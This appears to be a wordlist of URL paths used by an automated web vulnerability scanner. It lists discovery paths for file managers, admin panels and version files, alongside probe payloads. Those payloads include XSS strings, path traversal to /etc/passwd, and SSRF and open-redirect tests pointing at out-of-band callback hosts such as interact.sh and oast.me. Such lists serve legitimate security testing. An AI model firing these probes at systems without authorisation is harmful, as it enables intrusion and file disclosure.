/admin/elfinder/elfinder-cke.html
/assets/backend/elfinder/elfinder-cke.html
/assets/elFinder-2.1.9/elfinder.html
/assets/elFinder/elfinder.html
/backend/elfinder/elfinder-cke.html
/elfinder/elfinder-cke.html
/uploads/assets/backend/elfinder/elfinder-cke.html
/uploads/assets/backend/elfinder/elfinder.html
/uploads/elfinder/elfinder-cke.html
/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/v1/folder?path=%2F
/js/elfinder.min.js
/js/elFinder.version.js
/ocpu/library/base/R/do.call/json
/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1
/index.php?download=/etc/passwd
/cors_proxy/https://oast.me/
/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd
/index.php?s=example
/unified-console.html
/install
/umbraco/management/api/v1/server/status
/ajax-api/2.0/preview/mlflow/experiments/get?experiment_id=0
/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
/static/css//../../../../../../../../etc/passwd
/render.html?url=https://oast.live
/auth/login
/fuel/login
/ovirt-engine/userportal/
/ovirt-engine/webadmin/
/ocpu/
/authentication/login
/webapi/ping
/api/tenants
/api/status
/v1/sys/debug
/
/administrator/manifests/files/joomla.xml
/language/en-GB/en-GB.xml
/README.txt
/modules/custom.xml
/v2
/Vagrantfile
/awstats/data
/login?next=http://interact.sh/?app.scan/
/signup?next=http://interact.sh/?app.scan/
/select_project.php?url=http://interact.sh
/clock_status.php?current_page=http://interact.sh
/auth/login?to=/92874%27;alert(document.domain)//280
/karma.js
/?return_url=javascript:alert(document.domain)
/api/logout?redirect_to=http://oast.pro/
/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E

/file=https://oast.pro
/file=https://interact.sh
/ui/gradio_api/file=https://oast.me
/redirect-to?url=https%3A%2F%2Finteract.sh
/response-headers?Content-Type=text/html&Server=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/steve/services/
/services/
